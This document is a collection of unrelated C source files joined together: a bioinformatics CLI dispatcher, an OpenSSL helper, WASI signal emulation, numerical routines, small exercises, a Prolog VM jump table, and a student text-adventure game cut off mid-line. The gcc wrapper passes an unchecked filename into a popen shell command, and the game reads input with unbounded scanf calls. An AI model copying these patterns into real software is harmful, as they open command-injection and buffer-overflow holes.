#include <stdio.h> #include <stdlib.h> #include <string.h> int create_main(int argc, char **argv); int view_main(int argc, char **argv); int denoise_main(int argc, char **argv); int histo_main(int argc, char **argv); int htest_main(int argc, char **argv); int dmodel_main(int argc, char **argv); int est_dmodel_main(int argc, char **argv); int lrdmodel_main(int argc, char **argv); static int usage(char **argv) { printf("\nUsage: %s <command> [options]\n\n", argv[0]); printf("Main commands:\n"); printf(" create - Create bindump from bam file that subsequent\n"); printf(" analysis will take as input.\n"); printf(" view - Inspect contents of bindump and apply filters\n"); printf(" to it.\n"); printf(" histo - Show ASCII histogram of frequencies in bindump.\n"); printf(" \n"); printf(" lrdmodel - Use the GMM to combine the fixed and free models\n"); printf(" and assess the delta-log-likelihood.\n"); printf(" denoise - Use the GMMU model to detect and remove a uniform\n"); printf(" baseline from the histogram.\n\n"); printf("other:\n"); printf(" modeltest - Use the GMM based test against the three fixed\n"); printf(" models.\n"); printf(" estmodel - Use the GMM to estimate the free model.\n"); printf(" \n"); printf(" histotest - Use a simple, linear regression based test against\n"); printf(" the three fixed models.\n\n"); printf("Please run any of these commands without arguments for usage instructions.\n\n"); printf("For further documentation please also refer to the online manual\n"); printf("at https://github.com/clwgg/nQuire or the README.org file.\n\n"); return 1; } int main(int argc, char **argv) { if (argc < 2) return usage(argv); int ret = 0; if (strcmp(argv[1], "create") == 0) ret = create_main(argc-1, argv+1); else if (strcmp(argv[1], "view") == 0) ret = view_main(argc-1, argv+1); else if (strcmp(argv[1], "denoise") == 0) ret = denoise_main(argc-1, argv+1); else if (strcmp(argv[1], "histo") == 0) ret = histo_main(argc-1, argv+1); else if (strcmp(argv[1], "histotest") == 0) ret = htest_main(argc-1, argv+1); else if (strcmp(argv[1], "modeltest") == 0) ret = dmodel_main(argc-1, argv+1); else if (strcmp(argv[1], "estmodel") == 0) ret = est_dmodel_main(argc-1, argv+1); else if (strcmp(argv[1], "lrdmodel") == 0) ret = lrdmodel_main(argc-1, argv+1); else { fprintf(stderr, "Unknown command %s\n", argv[1]); usage(argv); } return ret; }
the_stack_data/97013847.c
/* * Copyright 2001-2021 The OpenSSL Project Authors. All Rights Reserved. * * Licensed under the Apache License 2.0 (the "License"). You may not use * this file except in compliance with the License. You can obtain a copy * in the file LICENSE in the source distribution or at * https://www.openssl.org/source/license.html */ #include <openssl/crypto.h> #include <openssl/opensslconf.h> #if defined(OPENSSL_SYS_WIN32) || defined(OPENSSL_SYS_VXWORKS) || defined(OPENSSL_SYS_UEFI) || defined(OPENSSL_SYS_AMIGA) int OPENSSL_issetugid(void) { return 0; } #elif defined(__OpenBSD__) || (defined(__FreeBSD__) && __FreeBSD__ > 2) || defined(__DragonFly__) || (defined(__GLIBC__) && defined(__FreeBSD_kernel__)) # include <unistd.h> int OPENSSL_issetugid(void) { return issetugid(); } #else # include <unistd.h> # include <sys/types.h> # if defined(__GLIBC__) && defined(__GLIBC_PREREQ) # if __GLIBC_PREREQ(2, 16) # include <sys/auxv.h> # define OSSL_IMPLEMENT_GETAUXVAL # endif # elif defined(__ANDROID_API__) /* see https://developer.android.google.cn/ndk/guides/cpu-features */ # if __ANDROID_API__ >= 18 # include <sys/auxv.h> # define OSSL_IMPLEMENT_GETAUXVAL # endif # endif int OPENSSL_issetugid(void) { # ifdef OSSL_IMPLEMENT_GETAUXVAL return getauxval(AT_SECURE) != 0; # else return getuid() != geteuid() || getgid() != getegid(); # endif } #endif
the_stack_data/99348.c
// Userspace emulation of `raise` and `signal`. // // WebAssembly doesn't support asynchronous signal delivery, so we can't // support it in WASI libc. But we can make things like `raise` work. #define _WASI_EMULATED_SIGNAL #define _ALL_SOURCE #define _GNU_SOURCE #include <signal.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <assert.h> void __SIG_IGN(int sig) { // do nothing } _Noreturn void __SIG_ERR(int sig) { __builtin_trap(); } _Noreturn static void core_handler(int sig) { fprintf(stderr, "Program recieved fatal signal: %s\n", strsignal(sig)); abort(); } _Noreturn static void terminate_handler(int sig) { fprintf(stderr, "Program recieved termination signal: %s\n", strsignal(sig)); abort(); } _Noreturn static void stop_handler(int sig) { fprintf(stderr, "Program recieved stop signal: %s\n", strsignal(sig)); abort(); } static void continue_handler(int sig) { // do nothing } static const sighandler_t default_handlers[_NSIG] = { // Default behavior: "core". [SIGABRT] = core_handler, [SIGBUS] = core_handler, [SIGFPE] = core_handler, [SIGILL] = core_handler, #if SIGIOT != SIGABRT [SIGIOT] = core_handler, #endif [SIGQUIT] = core_handler, [SIGSEGV] = core_handler, [SIGSYS] = core_handler, [SIGTRAP] = core_handler, [SIGXCPU] = core_handler, [SIGXFSZ] = core_handler, #if defined(SIGUNUSED) && SIGUNUSED != SIGSYS [SIGUNUSED] = core_handler, #endif // Default behavior: ignore. [SIGCHLD] = SIG_IGN, #if defined(SIGCLD) && SIGCLD != SIGCHLD [SIGCLD] = SIG_IGN, #endif [SIGURG] = SIG_IGN, [SIGWINCH] = SIG_IGN, // Default behavior: "continue". [SIGCONT] = continue_handler, // Default behavior: "stop". [SIGSTOP] = stop_handler, [SIGTSTP] = stop_handler, [SIGTTIN] = stop_handler, [SIGTTOU] = stop_handler, // Default behavior: "terminate". [SIGHUP] = terminate_handler, [SIGINT] = terminate_handler, [SIGKILL] = terminate_handler, [SIGUSR1] = terminate_handler, [SIGUSR2] = terminate_handler, [SIGPIPE] = terminate_handler, [SIGALRM] = terminate_handler, [SIGTERM] = terminate_handler, [SIGSTKFLT] = terminate_handler, [SIGVTALRM] = terminate_handler, [SIGPROF] = terminate_handler, [SIGIO] = terminate_handler, #if SIGPOLL != SIGIO [SIGPOLL] = terminate_handler, #endif [SIGPWR] = terminate_handler, }; static sighandler_t handlers[_NSIG]; int raise(int sig) { if (sig < 0 || sig >= _NSIG) { errno = EINVAL; return -1; } sighandler_t func = handlers[sig]; if (func == NULL) { default_handlers[sig](sig); } else { func(sig); } return 0; } void (*signal(int sig, void (*func)(int)))(int) { assert(SIG_DFL == NULL); if (sig < 0 || sig >= _NSIG) { errno = EINVAL; return SIG_ERR; } if (sig == SIGKILL || sig == SIGSTOP) { errno = EINVAL; return SIG_ERR; } sighandler_t old = handlers[sig]; handlers[sig] = func; return old; } extern __typeof(signal) bsd_signal __attribute__((weak, alias("signal"))); extern __typeof(signal) __sysv_signal __attribute__((weak, alias("signal")));
the_stack_data/78586.c
#include <stdio.h> #include <stdlib.h> #include <math.h> /* forward_diff function receives from the calling program the name fn of an external function program, the argument x and the step delta and must return as the forward difference approximation to the derivative of the function fn calculated at x with step size delta. */ double forward_diff(double (*fn)(double), double x, double delta) { return (fn(x+delta)-fn(x))/delta; } /* center_diff function receives from the calling program the name fn of an external function program, the argument x and the step delta and must return as the central difference approximation to the derivative of the function fn calculated at x with step size delta (to avoid any possible confusion, this means that fn will be evaluated at x-delta and x+delta). */ double center_diff(double (*fn)(double), double x, double delta) { return (fn(x+delta)-fn(x-delta))/(2*delta); } /* second_deriv function receives from the calling program the name fn of an external function program, the argument x and the step delta and must return the approximation to the second derivative of the function fn at x based on the values taken by fn at x and at the nearest neighbor points x+dx, x-dx. */ double second_deriv(double (*fn)(double), double x, double delta) { return (fn(x+delta)+fn(x-delta)-2*fn(x))/(delta*delta); } /* trap_integrate function receives from the calling program the name fn of an external function program and the lower and upper limits of an integration domain, x0 and xn, and must return the approximation to the integral of fn over the interval x0,xn given by the trapezoidal formula based on a subdivision of the interval of integration into n equal subintervals. */ double trap_integrate(double (*fn)(double), double x0, double xn, int n) { double ti=0.; double delta; delta = (xn-x0)/(double)n; for(int i = 1; i < n; i++) { ti += delta*fn(x0+i*delta); } ti += delta/2*(fn(x0)+fn(xn)); return ti; } /* simpson_integrate function receives from the calling program the name fn of an external function program and the lower and upper limits of an integration domain, x0 and xn, and must return the approximation to the integral of fn over the interval x0, xn given by Simpson's formula based on a subdivision of the interval of integration into 2*n equal subintervals. */ double simpson_integrate(double (*fn)(double), double x0, double xn, int n) { double si=0.; double delta; delta = (xn-x0)/(2.*(double)n); for(int i = 1; i < 2*n; i++) { if(i & 1) { si += 4*fn(x0+i*delta); } else { si += 2*fn(x0+i*delta); } } si = delta/3.*(si+fn(x0)+fn(xn)); return si; } /* evolve_decay receives from the calling program the initial mass of matter M, the decay rate lambda, the time step dt, and the number of steps nsteps to evolve the system. The function should then evolve M by nsteps steps using the Euler method, and return the final value of M. */ double evolve_decay(double M, double lambda, double dt, int nsteps) { for(int i = 0; i < nsteps; i++) { M = M*(1.-lambda*dt); } return M; }
the_stack_data/157771.c
#ifdef TEST #include "unity.h" #include "main.h" void setUp(void) { } void tearDown(void) { } void test_main_NeedToImplement(void) { TEST_IGNORE_MESSAGE("Need to Implement main"); } #endif // TEST
the_stack_data/159516829.c
#include <stdio.h> int main() { long n; scanf("%ld", &n); long a = -1, b = -1; while (n--) { a = b; scanf("%ld", &b); } if (a == -1) puts(b == 15 ? "DOWN" : b == 0 ? "UP" : "-1"); else if (a == 14 && b == 15) puts("DOWN"); else if (a == 1 && b == 0) puts ("UP"); else puts (a > b ? "DOWN" : "UP"); }
the_stack_data/154829552.c
#include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]){ //We need 4 arguments "program source -o binary" if(argc < 4){ printf("Insufficient arguments\n"); return 1; } char * sourceFilename = argv[1]; char * destFilename = argv[3]; FILE * inputFile = fopen(sourceFilename, "r"); if(inputFile == NULL){ printf("File does not exist"); return 1; } //Get source file size fseek(inputFile, 0 , SEEK_END); int sourceFileSize = ftell(inputFile); rewind(inputFile); //Read source file into buffer with one extra byte to accomodate '\0' int actualBuffSizeRequired = sourceFileSize + 1; char * buffer = (char *) malloc(actualBuffSizeRequired); buffer[sourceFileSize] = '\0'; int read = fread(buffer, sizeof(char), sourceFileSize, inputFile); fclose(inputFile); /* We pass the source code to GCC as the backend compiler */ char compileCommand[500]; //Generate compile command, tell GCC to assume C language and get source code via stdin snprintf(compileCommand, 500, "gcc -o %s -xc -", destFilename); FILE * gccStdin; gccStdin = popen(compileCommand, "w"); //Pass source code to GCC via stdin fwrite(buffer, sizeof(char), sourceFileSize, gccStdin); //Print actual source code used in compilation for reference printf("%s\n", buffer); pclose(gccStdin); free(buffer); }
the_stack_data/37882.c
/* * box_muller.c * * Created on: Feb 12, 2010 * Author: manghel */ /* boxmuller.c Implements the Polar form of the Box-Muller Transformation (c) Copyright 1994, Everett F. Carter Jr. Permission is granted by the author to use this software for any application provided this copyright notice is preserved. */ #ifdef OBSOLETE // Marked obsolete Aug 28, 2013. Use the Random class #include "pv_random.h" #include <math.h> float box_muller(float m, float s) /* normal random variate generator */ { /* mean m, standard deviation s */ float x1, x2, w, y1; static float y2; static int use_last = 0; if (use_last) /* use value from previous call */ { y1 = y2; use_last = 0; } else { do { x1 = 2.0 * pv_random_prob() - 1.0; x2 = 2.0 * pv_random_prob() - 1.0; w = x1 * x1 + x2 * x2; } while ( w >= 1.0 ); w = sqrt( (-2.0 * log( w ) ) / w ); y1 = x1 * w; y2 = x2 * w; use_last = 1; } return( m + y1 * s ); } #endif // OBSOLETE
the_stack_data/71037.c
/* This testcase is part of GDB, the GNU debugger. Copyright 2004-2019 Free Software Foundation, Inc. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. */ void arg_passing_test2 (void); int main (void) { arg_passing_test2 (); return 0; } /* Asm for procedure arg_passing_test2. The challenge here is getting past the 'mr 0,3' and 'stb' instructions. */ asm (" .section \".text\"\n" " .align 2\n" " .globl arg_passing_test2\n" " .type arg_passing_test2, @function\n" "arg_passing_test2:\n" " stwu 1,-64(1)\n" " stw 31,60(1)\n" " mr 31,1\n" " mr 0,3\n" " evstdd 4,16(31)\n" " stw 5,24(31)\n" " stw 7,32(31)\n" " stw 8,36(31)\n" " stw 9,40(31)\n" " stb 0,8(31)\n" " lwz 11,0(1)\n" " lwz 31,-4(11)\n" " mr 1,11\n" " blr\n" " .size arg_passing_test2, .-arg_passing_test2\n");
the_stack_data/56771.c
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_isspace.c :+: :+: :+: */ /* +:+ +:+ +:+ */ /* By: lgavalda <[email protected]> +#+ +:+ +#+ */ /* +#+#+#+#+#+ +#+ */ /* Created: 2017/12/02 15:12:23 by lgavalda #+# #+# */ /* Updated: 2018/02/05 17:05:52 by lgavalda ### ########.fr */ /* */ /* ************************************************************************** */ int ft_isspace(int c) { return (c == ' ' || c == '\t' || c == '\n' || c == '\v' || c == '\f' || c == '\r'); }
the_stack_data/176707087.c
#ifdef GCC static void *local_jmp_table[]={ &&lab_noop, &&lab_noop1, &&lab_allocate_det_b, &&lab_nondet, &&lab_cut_return, &&lab_return_det, &&lab_unify_constant_return_det, &&lab_cut_unify_value_return_det, &&lab_unify_value_return_det, &&lab_return_nondet, &&lab_unify_constant_return_nondet, &&lab_fork_unify_constant_return_nondet, &&lab_fork_unify_nil_unify_value_return_nondet, &&lab_unify_value_return_nondet, &&lab_bp_fork, &&lab_cut, &&lab_cut0, &&lab_unify_value_cut, &&lab_fail, &&lab_cut_fail, &&lab_fail0, &&lab_getbreg_y, &&lab_putbreg_y, &&lab_getpbreg_y, &&lab_halt, &&lab_halt0, &&lab_call0, &&lab_call_uv_d, &&lab_call_uv_det, &&lab_allocate_det, &&lab_call_uv_nondet, &&lab_call_uv_ot, &&lab_call_uuv_d, &&lab_call_uuv_det, &&lab_call_uuv_nondet, &&lab_call_uuv_ot, &&lab_call_uvv_d, &&lab_call_uvv_det, &&lab_call_uvv_nondet, &&lab_call_uvv_ot, &&lab_call_uvc_d, &&lab_call_uvc_det, &&lab_call_uvc_nondet, &&lab_call_uvc_ot, &&lab_call_uvu_d, &&lab_call_uvu_det, &&lab_call_uvu_nondet, &&lab_call_uvu_ot, &&lab_call_uvuv_d, &&lab_call_uvuv_det, &&lab_call_uvuv_nondet, &&lab_call_uvuv_ot, &&lab_call_uuuv_d, &&lab_call_uuuv_det, &&lab_call_uuuv_nondet, &&lab_call_uuuv_ot, &&lab_call_uuuuv_d, &&lab_call_uuuuv_det, &&lab_call_uuuuv_nondet, &&lab_call_uuuuv_ot, &&lab_call0_d, &&lab_call_v_d, &&lab_call_v_det, &&lab_call_v_nondet, &&lab_call_v_ot, &&lab_call_u_d, &&lab_call_u_det, &&lab_call_u_nondet, &&lab_call_u_ot, &&lab_call_2u_d, &&lab_call_2u_det, &&lab_call_2u_nondet, &&lab_allocate_nondet, &&lab_call_2u_ot, &&lab_call_3u_d, &&lab_call_3u_det, &&lab_call_3u_nondet, &&lab_call_3u_ot, &&lab_call_4u_d, &&lab_call_4u_det, &&lab_call_4u_nondet, &&lab_call_4u_ot, &&lab_call_5u_d, &&lab_call_5u_det, &&lab_call_5u_nondet, &&lab_call_5u_ot, &&lab_call_6u_d, &&lab_call_6u_det, &&lab_call_6u_nondet, &&lab_call_6u_ot, &&lab_call_7u_d, &&lab_call_7u_det, &&lab_call_7u_nondet, &&lab_call_7u_ot, &&lab_call_8u_d, &&lab_call_8u_det, &&lab_call_8u_nondet, &&lab_call_8u_ot, &&lab_call_9u_d, &&lab_call_9u_det, &&lab_call_9u_nondet, &&lab_call_9u_ot, &&lab_call_cu_d, &&lab_call_cu_det, &&lab_call_cu_nondet, &&lab_call_cu_ot, &&lab_call_cuu_d, &&lab_call_cuu_det, &&lab_call_cuu_nondet, &&lab_call_cuu_ot, &&lab_call_cuuu_d, &&lab_call_cuuu_det, &&lab_call_cuuu_nondet, &&lab_call_cuuu_ot, &&lab_call_cuuuu_d, &&lab_call_cuuuu_det, &&lab_call_cuuuu_nondet, &&lab_call_cuuuu_ot, &&lab_call_var, &&lab_call_var0, &&lab_jmp, &&lab_jmpn_eq_constant, &&lab_jmpn_nil, &&lab_jmpn_eq_struct, &&lab_jmpn_eq_struct_fetch_v, &&lab_switch_cons, &&lab_switch_cons_car, &&lab_switch_cons_910, &&lab_switch_cons_vv, &&lab_jmpn_eql_uu, &&lab_jmpn_eql_uc, &&lab_jmp_eql_uu, &&lab_jmp_eql_uu_fail, &&lab_jmp_eql_uu_ot, &&lab_jmp_eql_uc, &&lab_jmpn_gt_uu, &&lab_jmpn_gt_ui, &&lab_jmpn_gt_iu, &&lab_jmpn_ge_uu, &&lab_jmpn_ge_ui, &&lab_jmpn_ge_iu, &&lab_jmpn_id_uu, &&lab_jmpn_id_uc, &&lab_jmp_id_uu, &&lab_jmp_id_uc, &&lab_jmpn_var_y, &&lab_jmpn_var_y_fail0, &&lab_jmpn_var_y_ot, &&lab_jmp_var_y, &&lab_jmpn_atom_y, &&lab_jmpn_atomic_y, &&lab_jmpn_atomic_y_fail0, &&lab_jmpn_atomic_y_ot, &&lab_jmpn_num_y, &&lab_jmpn_float_y, &&lab_jmpn_int_y, &&lab_hash, &&lab_hash_jmpn_constant, &&lab_hash_branch_constant, &&lab_hash_jmpn_nil, &&lab_hash_jmpn_struct, &&lab_hash_branch_struct, &&lab_hash_jmpn_list0, &&lab_hash_jmpn_list, &&lab_para_uuuv, &&lab_para_uuv, &&lab_para_uv, &&lab_para_uuu, &&lab_para_uuuw, &&lab_para_uuw, &&lab_para_uw, &&lab_para_vv, &&lab_para_cuv, &&lab_para_cuuv, &&lab_para_uuuc, &&lab_para_uuc, &&lab_para_uu, &&lab_para_uc, &&lab_para_u, &&lab_para_v, &&lab_para_w, &&lab_para_c, &&lab_para_nil, &&lab_fetch_4v, &&lab_fetch_3v, &&lab_fetch_2v, &&lab_fetch_v, &&lab_fetch_vw, &&lab_fetch_wv, &&lab_fetch_w, &&lab_fetch_2w, &&lab_fetch_3w, &&lab_fetch_4w, &&lab_fetch_ws, &&lab_fetch_910, &&lab_fetch_45, &&lab_unify_constant, &&lab_fork_unify_constant, &&lab_unify_nil, &&lab_fork_unify_nil, &&lab_unify_struct, &&lab_fork_unify_struct, &&lab_unify_struct_cut, &&lab_unify_struct_arg_uv0, &&lab_unify_struct_arg_2v0, &&lab_unify_struct_arg_v0, &&lab_unify_struct_arg_2u, &&lab_unify_struct_arg_u, &&lab_unify_struct_arg_c, &&lab_unify_struct_arg_wc, &&lab_unify_arg_c, &&lab_unify_arg_u, &&lab_unify_arg_read_u, &&lab_unify_arg_v, &&lab_unify_arg_v0, &&lab_unify_arg_w, &&lab_unify_arg_struct, &&lab_unify_arg_list, &&lab_unify_arg_2c, &&lab_unify_arg_3c, &&lab_unify_arg_v0u, &&lab_unify_arg_v0c, &&lab_unify_arg_uv0, &&lab_unify_arg_v0w, &&lab_unify_arg_wc, &&lab_unify_arg_2v0, &&lab_unify_arg_3v0, &&lab_unify_arg_4v0, &&lab_unify_arg_3u, &&lab_unify_arg_2u, &&lab_unify_arg_2w, &&lab_unify_arg_3w, &&lab_unify_arg_4w, &&lab_unify_arg_5w, &&lab_build_arg_c, &&lab_build_arg_v, &&lab_build_arg_struct, &&lab_build_arg_list, &&lab_build_arg_2c, &&lab_build_arg_3c, &&lab_build_arg_v0u, &&lab_build_arg_v0c, &&lab_build_arg_uv0, &&lab_build_arg_v0w, &&lab_build_arg_wc, &&lab_build_arg_4v0, &&lab_build_arg_3v0, &&lab_build_arg_2v0, &&lab_build_arg_v0, &&lab_build_arg_5w, &&lab_build_arg_4w, &&lab_build_arg_3w, &&lab_build_arg_2w, &&lab_build_arg_w, &&lab_build_arg_4u, &&lab_build_arg_3u, &&lab_build_arg_2u, &&lab_build_arg_u, &&lab_unify_list, &&lab_unify_comp_list, &&lab_unify_cons, &&lab_cut_unify_cons_w, &&lab_unify_cons_w, &&lab_unify_cons_u, &&lab_unify_cons_v0, &&lab_cut_unify_cons_uu, &&lab_unify_cons_uu, &&lab_cut_unify_cons_uv, &&lab_unify_cons_uv0, &&lab_unify_cons_uw, &&lab_unify_cons_uc, &&lab_cut_unify_cons_vv, &&lab_unify_cons_v0v0, &&lab_cut_unify_cons_vu, &&lab_unify_cons_v0u, &&lab_unify_cons_v0w, &&lab_cut_unify_cons_vc, &&lab_unify_cons_v0c, &&lab_unify_cons_wv0, &&lab_unify_cons_cu, &&lab_cut_unify_cons_cv, &&lab_unify_cons_cv0, &&lab_unify_cons_cc, &&lab_unify_cons_ww, &&lab_unify_cons0_v910, &&lab_conc, &&lab_leng, &&lab_memb_le, &&lab_memb_el, &&lab_fork_unify_cons, &&lab_fork_unify_cons_uu, &&lab_fork_unify_cons_uv, &&lab_fork_unify_cons_uc, &&lab_fork_unify_cons_uw, &&lab_fork_unify_cons_vu, &&lab_fork_unify_cons_vv, &&lab_fork_unify_cons_vw, &&lab_fork_unify_cons_vc, &&lab_fork_unify_cons_cc, &&lab_fork_unify_cons_v910, &&lab_unify_value, &&lab_fork_unify_value, &&lab_move_constant, &&lab_move_struct, &&lab_move_struct0, &&lab_move_list, &&lab_move_comp_list, &&lab_move_comp_list1, &&lab_move_cons, &&lab_move_cons0_uv, &&lab_move_cons0_uu, &&lab_move_var, &&lab_move_value, &&lab_and, &&lab_or, &&lab_lshiftl, &&lab_lshiftr, &&lab_complement, &&lab_add_uuv, &&lab_add_uiv, &&lab_add_u1v, &&lab_add1, &&lab_sub_uuv, &&lab_sub_uiv, &&lab_sub_u1v, &&lab_sub1, &&lab_sub_iuv, &&lab_mul, &&lab_mul_iuv, &&lab_mul_uuv, &&lab_div, &&lab_idiv, &&lab_idiv_uiv, &&lab_idiv_uuv, &&lab_divge, &&lab_divle, &&lab_mod, &&lab_arg, &&lab_arg0, &&lab_setarg, &&lab_setarg0, &&lab_functor, &&lab_functor_uvv, &&lab_functor_vuu, &&lab_functor_arity, &&lab_get_clause_copy, &&lab_garbage_collect, &&lab_catch_clean_up, &&lab_throw_ball, &&lab_builtin0, &&lab_builtin1, &&lab_builtin2, &&lab_builtin3, &&lab_builtin4, &&lab_move_vars, &&lab_last_call, &&lab_last_call_var0, &&lab_last_call0, &&lab_last_call_d, &&lab_last_call1_d, &&lab_last_call_au_d, &&lab_last_call_au_det, &&lab_last_call_au_nondet, &&lab_last_call_au_ot, &&lab_last_call1_au_d, &&lab_last_call0_d, &&lab_last_call0_sa_d, &&lab_last_call0_sa_det, &&lab_last_call0_sa_nondet, &&lab_last_call0_sa_ot, &&lab_tr_det_call_au, &&lab_tr_det_call1_au, &&lab_tr_det_call2_au, &&lab_tr_det_call0, &&lab_tr_nondet_call_au, &&lab_tr_nondet_call1_au, &&lab_tr_nondet_call2_au, &&lab_tr_nondet_call0, &&lab_allocate_susp, &&lab_return_commit, &&lab_return_delay, &&lab_no_vars_gt, &&lab_trigger_var_ins, &&lab_trigger_var_minmax, &&lab_trigger_var_dom, &&lab_trigger_ins_min_max, &&lab_trigger_var_any_dom, &&lab_trigger_cg_event_handler, &&lab_fetch_event_object, &&lab_delay, &&lab_end_delay, &&lab_jmpn_dvar_y, &&lab_jmpn_susp_var_y, &&lab_interval_consistent_eq, &&lab_interval_consistent_eq_nocoe, &&lab_interval_consistent_ge, &&lab_call_binary_constr_eq, &&lab_domain_next_inst_yyy, &&lab_domain_set_false_yy, &&lab_domain_min_max_yyy, &&lab_domain_region, &&lab_domain_region_min, &&lab_domain_region_max, &&lab_v_in_cv_int, &&lab_v_in_vc_int, &&lab_u_in_cu_int, &&lab_u_in_uc_int, &&lab_u_eq_cu_dom, &&lab_u_eq_uc_dom, &&lab_bcp, &&lab_activate_first_agent, &&lab_activate_agents_conjunction, &&lab_activate_agents_disjunction, &&lab_table_allocate, &&lab_table_produce, &&lab_table_consume, &&lab_table_check_completion, &&lab_table_neck_no_reeval, &&lab_last_tabled_call, &&lab_table_cut, &&lab_table_neck, &&lab_table_eager_consume, &&lab_table_set_new_bit, &&lab_jmpn_unif, &&lab_jmp_unif, &&lab_arg_no_chk, &&lab_setarg0_no_chk, &&lab_bcp1, &&lab_domain_nogood_region, &&lab_endfile, &&lab_tabsize, &&lab_table_mode, &&lab_asp_decode, &&lab_asp_add_tuple, &&lab_set_catcher_frame, &&lab_filter_clauses}; #endif
the_stack_data/206393737.c
#include <stdio.h> // for printf() long f05(float n) { int N=n/0.5; long ans=0; for(int i=0;i<=N;i++) ans+=1; return ans; } long f1(float n) { int N=n/1; long ans=0; for(int i=0;i<=N;i++) ans+=f05(n-1*i); return ans; } long f5(float n) { int N=n/5; long ans=0; for(int i=0;i<=N;i++) ans+=f1(n-5*i); return ans; } long f10(float n) { int N=n/10; long ans=0; for(int i=0;i<=N;i++) ans+=f5(n-10*i); return ans; } long f20(float n) { int N=n/20; long ans=0; for(int i=0;i<=N;i++) ans+=f10(n-20*i); return ans; } long f50(float n) { int N=n/50; long ans=0; for(int i=0;i<=N;i++) ans+=f20(n-50*i); return ans; } long f100(float n) { int N=n/100; long ans=0; for(int i=0;i<=N;i++) ans+=f50(n-100*i); return ans; } int main() { float n; while(scanf("%f",&n)!=EOF){ printf("%ld\n",f100(n)); } return 0; }
the_stack_data/410411.c
//Contributors //Alejandra Villa //room #23 //G. Poppe //eclipse496 // // aperez //Mjkli - room number #3 // Mir Hassan Talpur #17 // Amado Rodriguez III #21 // Ivan Khaffaji Room #15 //Andres Llarena room #1 //Mary Shrestha Room#19 // Steve Yoon Room #14 #include <stdlib.h> #include <ctype.h> #include <string.h> #include <time.h> #include <stdio.h> #include<math.h> //riddle.txt needed to read/write file int combo(void); int countDown(void); int displayRiddle(void); #define MAXGUESSES 5 #define WORDSIZE 25 void castaway(void); //room 14 void wordScramble(int *gameScore); //room 14 void fightSystem(int *hp, int *machetePower); //room14 void randomFillGob(int *ptr); void printerGoblin(int *ptr); void sorterGoblin(int *ptr); int goblin(int choice); int blackPotionEffect(); void bluePotionWorld(); int randGen(int topNum); void blackJack(int *cards); int zom(int health,int *wepP,int wepr); //door 3 int wiz(int health,int *wepP,int wepr); //door 3 int kni(int health,int *wepP,int wepr); //door 3 int dem(int health,int *wepP,int wepr); //door 3 int ang(int health,int *wepP,int wepr); //door 3 void dead(void); // enemynames.txt needed to run functions void rm11EnemyName(char *enPtr); void rm11Dialog(int temp, char *enPtr, char *nmPtr); void rm11Battle(int *ptr, char *enPtr, char *nmPtr); void rollDiceRoom17(int *arr); //allocates array with random numbers using a pointer to array (room 17) int randomAscii(void); void fillSumArray(int* ptr, int size); void printSumArray(int* ptr, int size); int sumRandomArray(int* ptr, int size); //inputWord.txt needed to run functions void GameRules(); void LowerCaseWord(char word[]); void PlayAgain(int *againPtr); void PlayOneGame(char solution[], char secretword[]); void CreateSecretWord(char solution[], char secretword[]); void GetTheLetterGuess(char letterGussed[], char *letterPtr, int *numPtr); void ReplaceDash(char solution[], char secretword[], char letter); void DidYouWin(char solution[], char guess[]); void main(void) { int x,y,z,i,h,g,k,choice=0; char name[256]; int boxNum=0; srand(time(NULL)); printf("Please enter your name: "); //Input any number of array inputs scanf("%s",name); printf("Hello %s welcome to the rpgGame!\n",name); while(choice != 99) { puts("You find yourself in a dark room and you are not sure how you got here."); puts("As you look around you see the room has 25 doors, each labeled with a number. You are not sure how such a small room can have 25 doors, sooo magic..."); puts("The room starts filling with water and you must choose a door to open or you will likely drown. you may quit anytime by selecting option 99"); puts("What door do you choose?"); scanf("%d",&choice); switch(choice) { case 1: { char answer; int num, com; int result = 1; char riddle1[30], riddle2[30], riddle3[30]; char riddleOne[] = "What is a DOUGHNUT?"; char riddleTwo[] = "What is NOTHING?"; char riddleThree[] = "What is a WATERMELON?"; puts("You open the door then, close it behind you."); puts("You start freaking out because the water is starting to rise."); puts("You notice that there is a table with 3 boxes and an envelope."); puts("One box has the key to freedom it in.\n"); puts("Open the envelope, read the question and select the right answer from the choices given.\n"); while(choice != 99) { puts("You have 10 seconds to read the question."); puts("Wait for the prompt to enter your answer.\n"); puts("1. Which of the following is the correct format to compile a c program?\n"); puts("A. gcc o rpgGame rpgGame.c\n"); puts("B. gcc -o rpgGame.c rpgGame.c\n"); puts("C. gcc -o rpgGame rpgGame.c\n"); countDown(); printf("\nEnter a letter (A, B, or C) corresponding to your answer or enter Q to Quit): "); scanf("%s", &answer); if(answer == 'A' || answer == 'a') { com = combo(); printf("You need this number combination to open Box A : %d", com); printf("\nYou have 10 seconds to memorize the given combination."); puts(" Enter the combination after the prompt."); countDown(); printf("\nEnter the given combination to unlock the box now: "); scanf("%d", &num); while (num != com) { puts("Enter the correct combination before Cookie Monster grabs you! \n"); scanf("%d", &num); } puts("You entered the correct combination and the box is unlocked.\n"); puts("Open the box, put your hands inside, and grab what is inside."); puts("Ouch! You just got bitten by a snake. Try again before the poison takes effect.\n"); } else if(answer == 'B' || answer == 'b') { com = combo(); printf("You need this number combination to open Box B : %d", com); printf("\nYou have 10 seconds to memorize the given combination."); puts(" Enter the combination after the prompt."); countDown(); printf("\nEnter the given combination to unlock the box now: "); scanf("%d", &num); while (num !=com) { puts("Enter the correct combination before King Kong crushess you!\n"); scanf("%d", &num); } puts("You entered the correct combination and the box is unlocked.\n"); puts("Put your hand in box 2 and grab what is inside."); puts("Oh no! Your hand caught in a funnel-web spider's nest. Make another choice before you become paralyzed.\n"); } else if(answer == 'C' || answer == 'c') { displayRiddle(); puts("\nRemember to enter your answer in the form of question (e.g.What is a COCONUT?)"); do { printf("\nEnter your question for Riddle #1: "); fgets(riddle1, sizeof(riddleOne), stdin); result = strcmp(riddleOne, riddle1); } while (result !=0); printf("Your question is: %s\n", riddle1); printf("The correct question is: %s\n", riddleOne); printf("Sweet heavens! You are a brilliant person, %s\n", name); do { printf("\nEnter your question for Riddle #2: "); fgets(riddle2, 